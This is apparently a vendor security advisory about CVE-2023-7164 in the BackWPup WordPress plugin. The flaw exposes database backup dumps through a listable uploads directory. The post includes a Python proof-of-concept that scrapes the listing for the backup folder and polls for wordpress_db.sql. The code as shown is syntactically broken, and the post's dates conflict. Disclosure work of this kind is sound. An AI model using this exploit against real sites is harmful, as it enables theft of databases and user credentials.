A critical vulnerability, CVE-2023-7164, has been uncovered in the popular WordPress plugin BackWPup, impacting over 600,000 active installations. This flaw exposes sensitive data and paves the way for potential account takeovers, posing a severe threat to website security.

Main info:

PluginBackWPup < 4.0.4
CriticalVery High
All Time13 960 177
Active installations600 000+
Publicly PublishedMarch 17, 2023
Last UpdatedMarch 17, 2023
ResearcherDmtirii Ignatyev
OWASP TOP-10A3: Sensitive Data Exposure
Reference https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-7164
Plugin Security Certification by CleanTalk


December 13, 2023Plugin testing and vulnerability detection in the BackWPup plugin have been completed
December 13, 2023I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing
March 17, 2024Registered CVE-2023-7164

Discovery of the Vulnerability

During routine testing, security researchers identified a vulnerability in the logic of the directory /wordpress/wp-content/uploads/backwpup-{hash}-temp. This oversight exposes comprehensive details about the website’s configuration, directories, and files, granting unauthorized access to sensitive data stored within the database and all associated files.

Understanding of Sensitive Data Exposure attack’s

Sensitive Data Exposure occurs when an attacker gains unauthorized access to confidential information, such as user credentials or system configurations. In the case of BackWPup, this vulnerability allows attackers to view and download backup files containing critical data, including database dumps, facilitating account takeovers and compromising the entire system.

Exploiting the Sensitive Data Exposure Vulnerability

Exploiting this vulnerability involves manually triggering a backup process or exploiting the plugin’s automatic backup feature. By accessing the backup directory, attackers can download sensitive files, including database dumps, and use them to launch further attacks, such as brute force attacks on password hashes.


  • 1) The plugin has the ability to automatically backup , but for the speed of the POC, I will do it manually, but this is similar to automatic scanning.
  • 2) There is a lot of sensitive data and most importantly, you can download a backup file and upload it to your local car:
  • http://your_site/wordpress/wp-content/uploads/backwpup-{hash}-temp/wordpress_db.sql
  • 3) The exploit first accesses /wordpress/wp-content/uploads and parse the name of the backup folder with a hash, and then waits for the backup to start and a file with a database dump appears. This vulnerability works because practically every wordpress site has a directory listing along the path /wordpress/wp-content/uploads and you can view the folder names. Therefore, you should move this folder to wp-content or to any other folder where there is index.php
import requests
import time
import threading
from bs4 import BeautifulSoup 

base_url = ""

print(f"Checking directory listing at {base_url}")

def get_directory_listing(url):
        response = requests.get(url)
        if response.status_code == 200:
            return response.text
    except requests.RequestException as e:
        print(f"Error when requesting to {url}: {e}")
    return None

def check_url(url):
    while True:
            response = requests.get(url)
            if response.status_code == 200:
                print(f"File at {url} found! I display the contents...")
        except requests.RequestException as e:
            print(f"Error when requesting to {url}: {e}")


listing_html = get_directory_listing(base_url)

if listing_html:
    soup = BeautifulSoup(listing_html, 'html.parser')
    target_folder = None
    for link in soup.find_all('a'):
        if 'backwpup' in link.get('href') and 'temp' in link.get('href'):
            target_folder = link.get('href')

    if target_folder:
        target_url = f"{base_url}{target_folder}/wordpress_db.sql"
        print(f"Checking the following URL for wordpress_db.sql: {target_url}")
        thread = threading.Thread(target=check_url, args=(target_url,))
        print("Target folder not found in the directory listing.")
    print("Error retrieving directory listing.")


The consequences of this vulnerability are dire, potentially leading to unauthorized access to sensitive data, website defacement, or even complete system compromise. Attackers could exploit this flaw to steal sensitive information, compromise user accounts, or deploy malware, posing significant risks to website owners and users.

Recommendations for Improved Security

To mitigate the risk posed by CVE-2023-7164, website administrators are strongly advised to update the BackWPup plugin to the latest version immediately. Additionally, securing the backup directory by restricting access or relocating it to a directory with an index.php file can prevent unauthorized access. Regular security audits and monitoring are also recommended to detect and mitigate vulnerabilities proactively.

By taking proactive measures to address Sensitive Data Exposure vulnerabilities like CVE-2023-7164, WordPress website owners can enhance their security posture and safeguard against potential exploitation. Stay vigilant, stay secure.

#WordPressSecurity #SensitiveDataExposure #WebsiteSafety #StayProtected #VeryHighVulnerability

Use CleanTalk solutions to improve the security of your website


Create your CleanTalk account

By signing up, you agree with license. Have an account? Log in.
CVE-2023-7164 – BackWPup – Sensitive Data Exposure to Account Takeover – POC

Leave a Reply

Your email address will not be published. Required fields are marked *